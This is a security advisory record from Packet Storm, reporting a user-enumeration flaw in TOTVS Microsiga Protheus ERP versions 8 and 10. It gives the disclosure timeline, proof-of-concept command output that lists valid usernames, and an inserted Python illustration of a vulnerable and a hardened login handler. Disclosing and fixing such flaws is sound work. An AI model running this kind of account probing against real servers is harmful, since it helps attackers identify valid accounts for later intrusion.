TOTVS ERP Microsiga Protheus User Enumeration

2011-03-04T00:00:00
ID PACKETSTORM:98919
Type packetstorm
Reporter Flavio do Carmo Junior
Modified 2011-03-04T00:00:00

Description

[DCA-2011-0002]
  
  
[Discussion]  
- DcLabs Security Research Group advises about the following vulnerability:
  
[Software]  
- TOTVS ERP Microsiga Protheus  
  
[Vendor Product Description - translated from Portuguese]
- Management Software - TOTVS
TOTVS is a software, innovation, relationship and management support
company, the absolute leader in Brazil with a 49.1% market share, and
also in Latin America with 31.2%*; it is the largest application software
company headquartered in emerging countries and the 7th largest in the
world in the sector. It has more than 25,200 active customers, is supported
by 9,000 participants and is present in 23 countries.
Value Proposition
To make the company more competitive, with faster decision-making, by
offering solutions that organize, discipline, define and enforce
processes, store data, generate information and assist management.
- Source: http://totvs.com.br/web/guest/software
  
[Advisory Timeline]  
- 02/Feb/2011 -> Initial contact to vendor, security contact request.  
- 03/Feb/2011 -> Security contact response.  
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.  
- 04/Feb/2011 -> Vendor confirms notification received.  
- 21/Feb/2011 -> Situation report requested.  
- 01/Mar/2011 -> No vendor response.  
- 02/Mar/2011 -> Advisory published.  
  
[Bug Summary]  
- User enumeration
  
[Impact]  
- Low  
  
[Affected Version]  
- Microsiga Protheus 8 (20081215030344)  
- Microsiga Protheus 10 (20100812040605)  
- Other versions can also be affected but weren't tested.  
  
[Bug Description and Proof of Concept]  
- The server validates the user before asking for a password, thus we  
can keep trying usernames until we get a password prompt.  
  
- A Proof of Concept has been created:  
  
--- command line output begin ---  
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h  
usage: totvs_users_enumerator.py [options] [filename]  
-h for help  
  
options:  
--version show program's version number and exit  
-h, --help show this help message and exit  
-i IPADDRESS, --ipaddress=IPADDRESS  
Server IP address  
-p PORT, --port=PORT Port number (defaults to 1234)  
-t TARGET, --target=TARGET  
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.  
Defaults to 10  
  
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10  
--ipaddress 192.168.4.95 userlist  
Valid user: admin  
Invalid user: fakeuser  
Invalid user: nobody  
Valid user: jonas  
Valid user: fernando  
Invalid user: elvis  
--- command line output end ---  
  
----------------------------------------------------------------------------------------  
  
All flaws described here were discovered and researched by:  
Flávio do Carmo Júnior aka waKKu.  
DcLabs Security Research Group  
carmo.flavio <AT> dclabs <DOT> com <DOT> br  
  
[Workarounds]  
- An initial workaround was provided to block a user after 3 failed
password attempts, but it doesn't work against this kind of user
enumeration, because no password is ever submitted for a rejected username.
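The following is an added illustration, not code from the advisory or from TOTVS: a minimal model of the login exchange described above (the real Protheus wire protocol is not reproduced, and the user table and handler names are constructed). It shows why checking the username before the password creates an enumeration oracle that a lockout-after-3-failed-passwords rule cannot stop, and how a uniform response removes it.

```python
# Hypothetical stand-ins for the server's login handler; not Protheus code.
import hashlib
import hmac

_SALT = b"constructed-salt"  # constructed sample value


def _h(pw: str, salt: bytes = _SALT) -> bytes:
    """Salted password hash (low iteration count only to keep the demo fast)."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 10_000)


# Constructed user table: username -> password hash (not real accounts).
USERS = {"admin": _h("correct horse"), "jonas": _h("hunter2")}
# Dummy hash so unknown usernames cost the same work as known ones.
_DUMMY = _h("dummy")


def vulnerable_login(user: str, password: str) -> str:
    """Validates the username first, so the reply leaks whether it exists."""
    if user not in USERS:
        return "INVALID_USER"  # distinct reply, no password ever checked
    if hmac.compare_digest(USERS[user], _h(password)):
        return "OK"
    return "INVALID_PASSWORD"  # distinct reply: the account exists


def hardened_login(user: str, password: str) -> str:
    """Always runs the full check and returns one generic failure."""
    stored = USERS.get(user, _DUMMY)  # same work whether or not user exists
    ok = hmac.compare_digest(stored, _h(password))
    if ok and user in USERS:
        return "OK"
    return "INVALID_CREDENTIALS"  # identical for unknown user and bad password


def leaks_user_existence(login) -> bool:
    """Regression check: does a wrong password on a real account produce a
    different reply than an unknown account? True means enumeration works."""
    known = login("admin", "wrong-password")
    unknown = login("fakeuser", "wrong-password")
    return known != unknown


if __name__ == "__main__":
    print("vulnerable leaks:", leaks_user_existence(vulnerable_login))  # True
    print("hardened leaks:", leaks_user_existence(hardened_login))  # False
```

The same check can be pointed at any login handler as a unit test, so the fix does not silently regress when the handler is refactored.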
  
[Credits]  
DcLabs Security Research Group.  
  
--
Best regards,
  
Flávio do Carmo Júnior aka waKKu @ DcLabs  
Florianópolis/SC  
http://br.linkedin.com/in/carmoflavio  
http://0xcd80.wordpress.com  